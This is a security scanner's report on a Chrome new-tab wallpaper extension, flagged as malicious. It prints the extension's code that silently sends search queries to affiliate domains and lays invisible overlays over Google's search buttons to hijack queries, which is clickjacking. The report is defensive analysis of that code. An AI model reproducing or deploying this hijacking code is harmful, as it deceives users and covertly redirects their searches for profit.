3D Wallpapers

3D Wallpapers

ID: fofbadhopmpnmfbkpmkifnkiahoddapp

Supported Languages

🇺🇸English

Extension Info & Metadata

Status
Active
Version
0.8
Size
9.34 MB
Rating
3.0/5
Reviews
2
Users
466
Type
Extension
Updated
Jul 1, 2024
Category
Tools
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
Triplex MediaView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
Yes
Mailbox exists
Yes
Website
Visit
Total Extensions
5
Active
4
Obsolete
1
Listed
5
Unlisted
0
Total Users
4,467
Screenshot 1

3D Wallpapers.

Download our really cool 3D New Tab Wallpaper extension, created specifically for fans of cool 3D Wallpapers Just open a new tab and each new tab will - Show beautiful 3D new tab home screen wallpapers - Providing the best search results by changing your search engine on the new tab to Google - Easy view time of day By clicking "Add to chrome", I accept and agree to installing the 3D Wallpapers Chrome extension and setting Chromeâ„¢ New Tab to that provided by the service and the Privacy(https://triplex.media/privacy_policy.html) and Terms of Use(https://triplex.media/terms.html). Triplex Media, 1/60 Park St, Sydney NSW 2000 [email protected]

Item
Type
Severity
Description
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:• 15% increase: Older manifest version lacks modern security controls
Older Manifest Version
Risk Factor
Medium
This extension uses Manifest Version 2

The 'yahoo' case is set as the default (selectedSearchEngine = 'yahoo') but is actually routed to find.digital-marketing-ads.com with a hardcoded affiliate ID (gd=SY1003609, searchsource=69). This is an undisclosed affiliate search monetization scheme masquerading as a Yahoo search option. The CWS description claims the extension provides Google search results, but all searches default to this third-party affiliate aggregator, which is unrelated to the extension's stated wallpaper purpose and not disclosed in any privacy policy category.

js/tabCustomizer.js (Line 33)
switch (selectedSearchEngine) {  case "google":    finalUrl = "https://www.google.com/search?q=" + $("input[name='q']")      .val();    break;  case "bing":    finalUrl = "https://www.bing.com/search?q=" + $("input[name='q']")      .val();    break;  default:    finalUrl = "https://find.digital-marketing-ads.com/results.aspx?gd=SY1003609&searchsource=69&q=" + $(        "input[name='q']")      .val();    break;}

This content script targets Google's search results page (using Google-specific CSS selectors .FPdoLc and .gNO89b for the submit button) and places invisible absolutely-positioned overlays (z-index: 999999999999999) directly over Google's search buttons. When a user types a query and presses Enter or clicks what appears to be Google's search button, their query is silently hijacked to search45.com instead. This constitutes clickjacking of a major search engine to redirect queries to an undisclosed affiliate search service. Although this file is not declared in the bundled manifest.json (no content_scripts key), its presence in the extension bundle indicates prior active deployment or a staged rollout that has not yet been enabled in this version.

contentScript/contentScript.js (Line 1)
$(document)  .ready(function() {    $(document)      .on("click", ".sbct .suggestions-inner-container", function(event) {        event.stopPropagation();        location.href = "http://search45.com/search?q=" + $(this)          .find(".sbtc")          .text();      });    $(document)      .on("keyup", 'input[name="q"]', function(event) {        if (event.key == "Enter") {          location.href = "http://search45.com/search?q=" + $(this)            .val();        }        if ($('#overlay-google-search1')          .length == 0) {          $('body')            .append(`                <div id="overlay-google-search1"></div>            `);        }        if ($('#overlay-google-search2')          .length == 0) {          $('body')            .append(`                <div id="overlay-google-search2"></div>            `);        }        $('#overlay-google-search1')          .css({            'position': 'absolute',            'left': window.scrollX + $('.FPdoLc input[name="btnK"]')[0].getBoundingClientRect()              .left,            'top': window.scrollY + $('.FPdoLc input[name="btnK"]')[0].getBoundingClientRect()              .top,            "width": $('.FPdoLc input[name="btnK"]')[0].offsetWidth,            "height": $('.FPdoLc input[name="btnK"]')[0].offsetHeight,            "z-index": 999999999999999          });      });    $(document)      .on("click", '#overlay-google-search1, #overlay-google-search2', function(event) {        location.href = "http://search45.com/search?q=" + $('input[name="q"]')          .val();      });  });

The HTML form's fallback action attribute points to search101.info, a third-party search affiliate domain not disclosed in the privacy policy and unrelated to the extension's stated purpose. If JavaScript is unavailable or the tabCustomizer.js submit handler fails, search queries would be submitted directly to this undisclosed third-party. This provides a secondary undisclosed search monetization channel.

views/tabs/tabs.html (Line 86)
<form method="get" action="https://search101.info/search.php" id="frmSearch">

The bundled manifest declares manifest_version 2 and author 'Frooty Studios', while the live CWS listing shows manifest_version 3 and attributes the extension to 'Triplex Media'. The author name discrepancy strongly suggests the extension was transferred or rebranded after initial submission, a pattern associated with extension acquisition for monetization abuse. The manifest version mismatch may indicate the CWS listing was updated without the corresponding ZIP being replaced.

manifest.json (Line 1)
{  "name": "3D Wallpapers",  "author": "Frooty Studios",  "version": "0.8",  "manifest_version": 2,  "permissions": []}

By severity

Critical0
High2
Medium2
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
0.84

Files with findings

4 distinct paths — top paths by unique finding count:

  • contentScript/contentScript.js1
  • js/tabCustomizer.js1
  • manifest.json1
  • views/tabs/tabs.html1
S.No.
Category
Severity
File
Summary
Found in Version
1Other
high
js/tabCustomizer.js (line 33)The 'yahoo' case is set as the default (selectedSearchEngine = 'yahoo') but is actually routed to find.digital-marketing-ads.com with a hardcoded affiliate ID (gd=SY1003609, searchsource=69). This is an undisclosed af…
2Other
high
contentScript/contentScript.js (line 1)This content script targets Google's search results page (using Google-specific CSS selectors .FPdoLc and .gNO89b for the submit button) and places invisible absolutely-positioned overlays (z-index: 999999999999999) d…
3Other
medium
views/tabs/tabs.html (line 86)The HTML form's fallback action attribute points to search101.info, a third-party search affiliate domain not disclosed in the privacy policy and unrelated to the extension's stated purpose. If JavaScript is unavailab…
4Other
medium
manifest.json (line 1)The bundled manifest declares manifest_version 2 and author 'Frooty Studios', while the live CWS listing shows manifest_version 3 and attributes the extension to 'Triplex Media'. The author name discrepancy strongly s…
URLs
88
IPv4
2
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.iec.chiec-http://www.iec.chIEC
www.iec.chdesc.iec-http://www.iec.chdesc.IEC
www.w3.org/1999/02/22-rdf-syntax-nshttp://www.w3.org/1999/02/22-rdf-syntax-ns#
ns.adobe.com/xap/1.0/http://ns.adobe.com/xap/1.0/
ns.adobe.com/xap/1.0/mm/http://ns.adobe.com/xap/1.0/mm/
ns.adobe.com/xap/1.0/sType/ResourceRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#
search45.com/searchhttp://search45.com/search?q=
www.google.com/searchhttps://www.google.com/search?q=
www.bing.com/searchhttps://www.bing.com/search?q=
find.digital-marketing-ads.com/results.aspxhttps://find.digital-marketing-ads.com/results.aspx?gd=SY1003609&searchsource=69&q=
Showing 1 to 10 of 90 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

2.3.3.3
IPv4
-
2.3.3.1
IPv4
-
Version
Size
Is Malicious
Findings
Permhash
0.8
Latest
9.34 MB
Malicious
4N/A
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.